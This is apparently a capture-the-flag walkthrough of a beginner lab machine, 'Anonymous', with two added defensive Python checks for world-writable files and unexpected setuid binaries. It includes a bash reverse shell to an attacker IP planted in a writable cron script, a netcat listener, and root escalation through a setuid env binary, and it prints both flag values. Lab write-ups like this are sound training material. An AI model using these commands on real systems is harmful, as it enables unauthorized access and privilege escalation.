Anonymous
Try to get the two flags! Root the machine and prove your understanding of the fundamentals! This is a virtual machine meant for beginners. Acquiring both flags will require some basic knowledge of Linux and privilege escalation methods.
Let's run nmap.
┌──(root㉿r3tr0)-[~]
└─# nmap -T5 -v -sV 10.10.20.162
nmap output:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-12 01:24 EST
NSE: Loaded 46 scripts for scanning.
Initiating Ping Scan at 01:24
Scanning 10.10.20.162 [4 ports]
Completed Ping Scan at 01:24, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:24
Completed Parallel DNS resolution of 1 host. at 01:24, 0.00s elapsed
Initiating SYN Stealth Scan at 01:24
Scanning 10.10.20.162 (10.10.20.162) [1000 ports]
Discovered open port 21/tcp on 10.10.20.162
Discovered open port 445/tcp on 10.10.20.162
Discovered open port 22/tcp on 10.10.20.162
Discovered open port 139/tcp on 10.10.20.162
Completed SYN Stealth Scan at 01:24, 1.91s elapsed (1000 total ports)
Initiating Service scan at 01:24
Scanning 4 services on 10.10.20.162 (10.10.20.162)
Completed Service scan at 01:24, 11.28s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.20.162.
Initiating NSE at 01:24
Completed NSE at 01:24, 0.00s elapsed
Initiating NSE at 01:24
Completed NSE at 01:24, 0.00s elapsed
Nmap scan report for 10.10.20.162 (10.10.20.162)
Host is up (0.10s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.62 seconds
Raw packets sent: 1005 (44.196KB) | Rcvd: 1002 (40.096KB)
Enumerate the machine. How many ports are open?
4
Which service is running on port 21?
ftp
Which service is running on ports 139 and 445?
smb
I try logging into the FTP service as anonymous.
┌──(root㉿r3tr0)-[~]
└─# ftp 10.10.20.162
Connected to 10.10.20.162.
220 NamelessOne's FTP Server!
Name (10.10.20.162:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||8298|)
150 Here comes the directory listing.
drwxr-xr-x 3 65534 65534 4096 May 13 2020 .
drwxr-xr-x 3 65534 65534 4096 May 13 2020 ..
drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts
226 Directory send OK.
ftp> cd scripts
250 Directory successfully changed.
ftp> ls -la
229 Entering Extended Passive Mode (|||45177|)
150 Here comes the directory listing.
drwxrwxrwx 2 111 113 4096 Jun 04 2020 .
drwxr-xr-x 3 65534 65534 4096 May 13 2020 ..
-rwxr-xrwx 1 1000 1000 314 Jun 04 2020 clean.sh
-rw-rw-r-- 1 1000 1000 1118 Nov 12 06:29 removed_files.log
-rw-r--r-- 1 1000 1000 68 May 12 2020 to_do.txt
226 Directory send OK.
ftp> get clean.sh
local: clean.sh remote: clean.sh
229 Entering Extended Passive Mode (|||30118|)
150 Opening BINARY mode data connection for clean.sh (314 bytes).
100% |****************************************************************| 314 2.62 MiB/s 00:00 ETA
226 Transfer complete.
314 bytes received in 00:00 (3.35 KiB/s)
ftp> get removed_files.log
local: removed_files.log remote: removed_files.log
229 Entering Extended Passive Mode (|||37011|)
150 Opening BINARY mode data connection for removed_files.log (1118 bytes).
100% |****************************************************************| 1118 6.42 MiB/s 00:00 ETA
226 Transfer complete.
1118 bytes received in 00:00 (11.97 KiB/s)
ftp> get to_do.txt
local: to_do.txt remote: to_do.txt
229 Entering Extended Passive Mode (|||48492|)
150 Opening BINARY mode data connection for to_do.txt (68 bytes).
100% |****************************************************************| 68 205.59 KiB/s 00:00 ETA
226 Transfer complete.
68 bytes received in 00:00 (0.72 KiB/s)
ftp> exit
221 Goodbye.
I examine the files I downloaded.
I add reverse shell code to the clean.sh file and send it back to the FTP service with the put command.
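As an added example (not part of the original writeup), the listing above can be checked mechanically: the script below parses `ls -la` style lines and flags entries that any user may modify, which is how a world-writable `clean.sh` inside an anonymous FTP directory shows up in an audit. The sample listing is copied from the FTP session above.

```python
"""Flag world-writable entries in an FTP directory listing.

Added example, not from the original writeup: it parses the `ls -la` lines
the FTP server returned and reports entries that any user may modify.
"""
import re
from dataclasses import dataclass

# Constructed sample: the two listings returned in the FTP session above.
SAMPLE_LISTING = """\
drwxr-xr-x 3 65534 65534 4096 May 13 2020 .
drwxr-xr-x 3 65534 65534 4096 May 13 2020 ..
drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts
-rwxr-xrwx 1 1000 1000 314 Jun 04 2020 clean.sh
-rw-rw-r-- 1 1000 1000 1118 Nov 12 06:29 removed_files.log
-rw-r--r-- 1 1000 1000 68 May 12 2020 to_do.txt
"""

# mode, links, owner, group, size, month, day, year-or-time, name
LINE_RE = re.compile(
    r"^([-dl][rwxsStT-]{9})\s+\d+\s+\S+\s+\S+\s+\d+\s+\S+\s+\d+\s+\S+\s+(.+)$"
)


@dataclass
class Finding:
    name: str
    mode: str
    kind: str         # "dir" or "file"
    executable: bool  # others may execute (or search, for a directory)


def parse_listing(text):
    """Yield (mode, name) pairs for each entry of a unix-style `ls -la` listing."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group(1), m.group(2)


def world_writable(text):
    """Return entries whose 'others' permission class includes write."""
    findings = []
    for mode, name in parse_listing(text):
        if name in (".", "..") or mode[8] != "w":
            continue
        kind = "dir" if mode[0] == "d" else "file"
        # 'x' is plain execute; 's'/'t' are execute combined with setuid/sticky.
        findings.append(Finding(name, mode, kind, mode[9] in "xst"))
    return findings


def writable_executables(text):
    """Regular files anyone can both modify and execute: the worst case, because a
    scheduled job that runs such a file executes whatever was last written to it."""
    return [f.name for f in world_writable(text) if f.kind == "file" and f.executable]
```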
sh -i >& /dev/tcp/10.14.61.127/1234 0>&1
Let's not forget to start netcat.
nc -nvlp 1234
After waiting a short while, we get access to the machine.
Let's stabilize our shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
user flag:
90d6f992585815ff991e68748c414740
Let's escalate our privileges and reach the root flag.
I enumerate the SUID files with the following command:
find / -perm -04000 -type f 2>/dev/null
namelessone@anonymous:~$ find / -perm -04000 -type f 2>/dev/null
find / -perm -04000 -type f 2>/dev/null
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/snap/core/9066/bin/mount
/snap/core/9066/bin/ping
/snap/core/9066/bin/ping6
/snap/core/9066/bin/su
/snap/core/9066/bin/umount
/snap/core/9066/usr/bin/chfn
/snap/core/9066/usr/bin/chsh
/snap/core/9066/usr/bin/gpasswd
/snap/core/9066/usr/bin/newgrp
/snap/core/9066/usr/bin/passwd
/snap/core/9066/usr/bin/sudo
/snap/core/9066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/9066/usr/lib/openssh/ssh-keysign
/snap/core/9066/usr/lib/snapd/snap-confine
/snap/core/9066/usr/sbin/pppd
/bin/umount
/bin/fusermount
/bin/ping
/bin/mount
/bin/su
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/env
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/at
/usr/bin/pkexec
Here /usr/bin/env catches my attention, and I go to the GTFOBins site to check whether I can escalate privileges with it.
We escalate our privileges with the command:
/usr/bin/env /bin/sh -p
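As an added defender-side example (not part of the original writeup), the same `find` inventory can be compared against a known-good allowlist so that an extra setuid binary such as `/usr/bin/env` stands out. The allowlist below is an assumption; a real one should be generated from a freshly provisioned copy of the same image. The inventory is an excerpt of the output above.

```python
"""Compare a setuid inventory against an allowlist to spot additions.

Added example, not part of the original writeup. EXPECTED_SUID is an
assumption: generate the real allowlist from a known-good build of the same
image (e.g. `find / -perm -04000 -type f` right after provisioning).
"""

# Constructed: an excerpt of the `find / -perm -04000 -type f` output above,
# including the /usr/bin/env entry the room plants.
SUID_INVENTORY = """\
/snap/core/9066/bin/su
/snap/core/9066/usr/bin/sudo
/bin/umount
/bin/fusermount
/bin/ping
/bin/mount
/bin/su
/usr/bin/passwd
/usr/bin/env
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
"""

# Assumed allowlist of setuid binaries expected on this kind of Ubuntu host.
EXPECTED_SUID = {
    "/bin/umount", "/bin/mount", "/bin/ping", "/bin/su", "/bin/fusermount",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/pkexec", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/at",
    "/usr/bin/newuidmap", "/usr/bin/newgidmap", "/usr/bin/traceroute6.iputils",
}


def classify_suid(inventory, expected=EXPECTED_SUID):
    """Split an inventory into (unexpected, snap_image, known) path lists.

    Paths under /snap/ come from mounted snap images and are reported
    separately so they do not drown out changes on the root filesystem.
    """
    unexpected, snap_image, known = [], [], []
    for raw in inventory.splitlines():
        path = raw.strip()
        if not path:
            continue
        if path.startswith("/snap/"):
            snap_image.append(path)
        elif path in expected:
            known.append(path)
        else:
            unexpected.append(path)
    return unexpected, snap_image, known
```

Run the inventory command on a schedule and alert when the first list is non-empty; a new entry on the root filesystem is either a package update or something to investigate.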
root flag:
4d930091c31a622a7ed10f27999af363